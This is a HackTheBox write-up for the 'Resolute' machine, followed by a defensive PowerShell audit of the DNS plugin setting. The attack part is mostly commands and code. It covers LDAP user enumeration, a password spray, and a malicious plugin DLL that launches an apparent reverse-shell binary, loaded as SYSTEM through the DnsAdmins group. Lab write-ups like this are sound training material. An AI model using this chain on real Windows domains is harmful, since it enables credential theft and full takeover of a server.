Resolute @ HackTheBox
Resolute is a 30-point Windows machine on HackTheBox that involves enumerating LDAP, password spraying, and using the DNSAdmins group to register a custom plugin DLL, which allows us to execute code as SYSTEM.
Notes
Windapsearch
windapsearch --dc resolute.htb -m users
windapsearch --dc resolute.htb -m users --full
windapsearch --dc resolute.htb -m users --attrs description
windapsearch --dc resolute.htb -m users --attrs sAMAccountName | grep sAMAccountName | cut -d " " -f2 | tee users.txt
https://github.com/ropnop/windapsearch
Kerbrute
kerbrute passwordspray -d megabank.local --dc resolute.htb users.txt 'Welcome123!'
https://github.com/ropnop/kerbrute
DNSAdmins Exploit
#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("C:\\programdata\\xc_10.10.14.4_1337.exe", 0);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
dnscmd resolute /config /serverlevelplugindll c:\programdata\xct.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
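From the defender's side, the registry value read above with Get-ItemProperty is the thing to audit. The following is an added example, not part of the original write-up: a PowerShell check that reports any registered ServerLevelPluginDll and lists who is in DnsAdmins. The function name Get-DnsPluginAudit is hypothetical, and the script assumes it runs on the DNS server with the ActiveDirectory module installed.

```powershell
# Added example (not from the original write-up).
# Assumptions: run locally on the DNS server / DC, ActiveDirectory module present.
function Get-DnsPluginAudit {
    [CmdletBinding()]
    param(
        [string]$ParametersKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    )

    # The value is absent on a default install, so suppress the "not found" error.
    $prop = Get-ItemProperty -Path $ParametersKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    $dll  = if ($prop) { $prop.ServerLevelPluginDll } else { $null }

    $result = [ordered]@{
        PluginDll         = $dll
        FileExists        = $false
        OutsideSystemRoot = $false
        Signature         = 'n/a'
        Sha256            = $null
        Finding           = 'OK: no ServerLevelPluginDll registered'
    }

    if ($dll) {
        $result.Finding           = 'REVIEW: the DNS service loads this DLL when it starts'
        # A plugin in a user-writable location such as C:\ProgramData deserves a closer look.
        $result.OutsideSystemRoot = -not ($dll -like "$env:SystemRoot\*")
        if (Test-Path -LiteralPath $dll -PathType Leaf) {
            $result.FileExists = $true
            $result.Signature  = (Get-AuthenticodeSignature -LiteralPath $dll).Status
            $result.Sha256     = (Get-FileHash -LiteralPath $dll -Algorithm SHA256).Hash
        }
    }
    [pscustomobject]$result
}

Get-DnsPluginAudit | Format-List

# Members of DnsAdmins are able to set this value, so keep the group small and reviewed.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass, distinguishedName
```

A non-empty PluginDll on a server where no DNS plugin was deliberately deployed should be treated as an incident lead, together with any recent stop/start of the DNS service.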
Thanks egre55 for creating this fun box!
This post is licensed under CC BY 4.0 by the author.